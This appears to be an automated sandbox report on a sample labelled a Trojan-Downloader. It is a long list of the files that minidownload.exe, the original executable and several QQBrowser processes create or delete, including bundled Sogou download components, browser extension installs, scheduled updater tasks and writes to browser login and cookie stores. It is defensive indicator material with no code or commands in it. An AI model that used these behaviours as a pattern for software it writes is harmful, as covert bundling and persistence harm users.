%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\stat.dat (44 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\error.dat (287 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\asyn_frame.dat (1967 bytes)
C:\SogouDownload\WiFi-2175.exe.td (9317 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\200U (164 bytes)
%Documents and Settings%\All Users\Application Data\Thunder Network\Mini_downloadlib\ODAwMDAzNzI=\Version_3_2_1_42\Profiles\download.cfg (1007 bytes)
C:\SogouDownload\WiFi-2175.exe.td.cfg (21563 bytes)

The Trojan-Downloader deletes the following file(s):

C:\SogouDownload\WiFi-2175.exe.td.cfg (0 bytes)

The process minidownload.exe:1832 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Program Files%\SogouSoftware\download\download\.svn\prop-base\atl71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\msvcp71.dll.svn-base (10930 bytes)
%Program Files%\SogouSoftware\download\download\ThunderFW.exe (3053 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\id.dat.svn-base (40 bytes)
%Program Files%\SogouSoftware\download\download\.svn\all-wcprops (1 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\download_engine.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\SogouSoftwareLoader.dll (11043 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniTPFw.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\MiniThunderPlatform.exe.svn-base (7951 bytes)
%Program Files%\SogouSoftware\download\download\.svn\entries (1 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\MiniThunderPlatform.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\xldl.dll (9424 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\zlib1.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\format (2 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\download_engine.dll.svn-base (75696 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\msvcr71.dll.svn-base (12773 bytes)
%Program Files%\SogouSoftware\download\download\msvcp71.dll (10930 bytes)
%Program Files%\SogouSoftware\download\download\MiniThunderPlatform.exe (7951 bytes)
%Program Files%\SogouSoftware\SogouSoftware.exe (6861 bytes)
%Program Files%\SogouSoftware\crash\.svn\entries (440 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\ThunderFW.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\id.dat (40 bytes)
%Program Files%\SogouSoftware\crash\.svn\prop-base\ExceptionReport.exe.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcr71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\download_engine.dll (75696 bytes)
%Program Files%\SogouSoftware\download\download\zlib1.dll (3170 bytes)
%Program Files%\SogouSoftware\crash\.svn\all-wcprops (301 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\dl_peer_id.dll.svn-base (2910 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\dl_peer_id.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\download\download\msvcr71.dll (12773 bytes)
%Program Files%\SogouSoftware\crash\.svn\format (2 bytes)
%Program Files%\SogouSoftware\crash\ExceptionReport.exe (3718 bytes)
%Program Files%\SogouSoftware\download\download\MiniTPFw.exe (1633 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\atl71.dll.svn-base (2201 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\ThunderFW.exe.svn-base (3053 bytes)
%Program Files%\SogouSoftware\download\download\.svn\prop-base\msvcp71.dll.svn-base (53 bytes)
%Program Files%\SogouSoftware\crash\.svn\text-base\ExceptionReport.exe.svn-base (3718 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\MiniTPFw.exe.svn-base (1633 bytes)
%Program Files%\SogouSoftware\download\download\atl71.dll (2201 bytes)
%Program Files%\SogouSoftware\download\download\dl_peer_id.dll (2910 bytes)
%Program Files%\SogouSoftware\download\download\.svn\text-base\zlib1.dll.svn-base (3170 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsz1.tmp (0 bytes)

The process %original file name%.exe:856 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\49UBGDUB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SXEFKT6V\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Cookies\index.dat (788 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (124 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\C9MJ0H6Z\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\S9EV8X6B\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\minidownload.exe (12289 bytes)
%Documents and Settings%\%current user%\Cookies\Current_User@sogou[2].txt (309 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Cookies\Current_User@sogou[1].txt (0 bytes)

The process QQBrowser.exe:1268 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extensions\ghgfpcpdfhmoghgepjalhnielnlemggj\9.0.0.31_0\BrowserProtect18.exe (3073 bytes)

The process QQBrowser.exe:2328 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Preferences (41 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\manifest.json (1115 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.js (6984 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_IMAGES (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\background.html (91 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\commenExtension.crx (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\CRX_INSTALL\s5-iframe.js (1 bytes)

The Trojan-Downloader deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_MESSAGE_CATALOGS (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\DECODED_IMAGES (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_4795\commenExtension.crx (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_2328_7365 (0 bytes)

The process QQBrowser.exe:2612 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (487 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_maximize.png (166 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (723 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\th\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\de\messages.json (570 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sr\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_16.png (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\id\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (594 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (731 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_hover.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es\messages.json (585 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_pressed.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (554 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\tr\messages.json (607 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button_close.png (252 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\flapper.gif (5224 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ko\messages.json (763 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\da\messages.json (531 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (499 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (527 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\et\messages.json (478 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\topbar_floating_button.png (160 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lv\messages.json (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pl\messages.json (603 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_CN\messages.json (641 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sk\messages.json (596 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_PT\messages.json (566 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_metadata\verified_contents.json (392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hr\messages.json (526 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fi\messages.json (602 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en_GB\messages.json (474 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\css\craw_window.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hi\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\html\craw_window.html (810 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ru\messages.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_window.js (14960 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_IMAGES (66 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nb\messages.json (533 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hu\messages.json (667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\cs\messages.json (588 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fil\messages.json (549 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\pt_BR\messages.json (560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\DECODED_MESSAGE_CATALOGS (27 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\craw_background.js (12376 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lt\messages.json (609 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ro\messages.json (597 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es_419\messages.json (548 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fr\messages.json (597 bytes)

The process QQBrowser.exe:3532 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\manifest.json (606 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.html (155 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.css (776 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\searchbar_ipad.js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\background.js (3 bytes)

The process QQBrowser.exe:2944 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%WinDir%\Tasks\QQBrowser Updater Task(Core).job (310 bytes)
%WinDir%\Tasks\QQBrowser Updater Task.job (306 bytes)

The process QQBrowser.exe:1968 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.html (215 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_MESSAGE_CATALOGS (24 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\background.js (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\DECODED_IMAGES (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.js (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\word_search.css (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\manifest.json (665 bytes)

The process QQBrowser.exe:3472 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\QB\QQBrowserConfig.dat (114 bytes)

The process QQBrowser.exe:3028 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Application Data\Tencent\QQBrowser\LastCheckTime (18 bytes)

The process QQBrowser.exe:2888 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\style.css (61 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\manifest.json (464 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_IMAGES (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\DECODED_MESSAGE_CATALOGS (24 bytes)

The process QQBrowser.exe:1252 makes changes in the file system.
The Trojan-Downloader creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\it\messages.json (622 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\vi\messages.json (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_bQat1WAHZ2iP4DW (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ca\messages.json (705 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_TW\messages.json (640 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Storage\chrome-extension_pafkbggdmjlpgkdkcbjmhmfcdpncadgh_0.localstorage-journal (5545 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fil\messages.json (692 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\bookmark.qbl (1927 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\10.tmp (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\F.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sv\messages.json (649 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\000003.log (2005 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Top Sites-journal (7056 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\uk\messages.json (789 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\bg\messages.json (886 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nl\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\sl\messages.json (642 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\CRX_INSTALL\manifest.json (797 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data (23757 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\2D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11.tmp (51528 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Login Data (2706 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension Rules\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hr\messages.json (633 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Shortcuts-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\EncryptedStorage (974 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\D.tmp (840 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\2B.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\12.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Web Data-journal (10522 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Extension State\LOG (176 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_KVGYNR2SKf1cluv (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\nb\messages.json (644 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\48.png (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cookies-journal (5308 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_3 (1736 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_2 (2600 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_1 (57080 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\data_0 (366156 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_8Ll8pVklSMihImC (131 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core_manual-journal (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\data_reduction_proxy_leveldb\000001.dbtmp (20 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_qUc0Jyb2V9rYcxY (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000005 (101 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\1A.tmp (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000007 (33 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000006 (80 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000001 (269 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_RkpE6WcOaDfQtj6 (532 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\f_000003 (16 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\14.tmp (54772 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8369\14.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_23842\CRX_INSTALL\manifest.json (862 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\26.tmp (3479 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\OnlineSetup\sso-f1\iniC.tmp.qbl (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\1D.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493\11.tmp (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lv\messages.json (699 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\zh_CN\messages.json (595 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\lt\messages.json (686 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_ZIkdiixhmGgAbyE (28 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\en_GB\messages.json (617 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_25493 (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\000003.log (31 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\switch_core_manual (592 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\27.tmp (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\el\messages.json (875 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Quick Links-journal (52413 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Cache\index (368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\28.tmp (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\fr\messages.json (708 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\images\icon_128.png (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\es_419\messages.json (667 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_12442\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\etilqs_XOTzPqgqOMDnkaA (286 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Visited Links (836 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_6722\CRX_INSTALL\manifest.json (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\ja\messages.json (778 bytes)
%Documents and Settings%\%current user%\Local Settings\Application Data\Tencent\QQBrowser\User Data\Default\Local Extension Settings\pafkbggdmjlpgkdkcbjmhmfcdpncadgh\MANIFEST-000001 (75 bytes)
%Documents and Settings%\%current user%\Application Data\Microsoft\CryptnetUrlCache\Content\62B5AF9BE9ADC1085C3C56EC07A82BF6 (152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\scoped_dir_1252_8772\CRX_INSTALL\_locales\hi\messages.json (941 bytes)
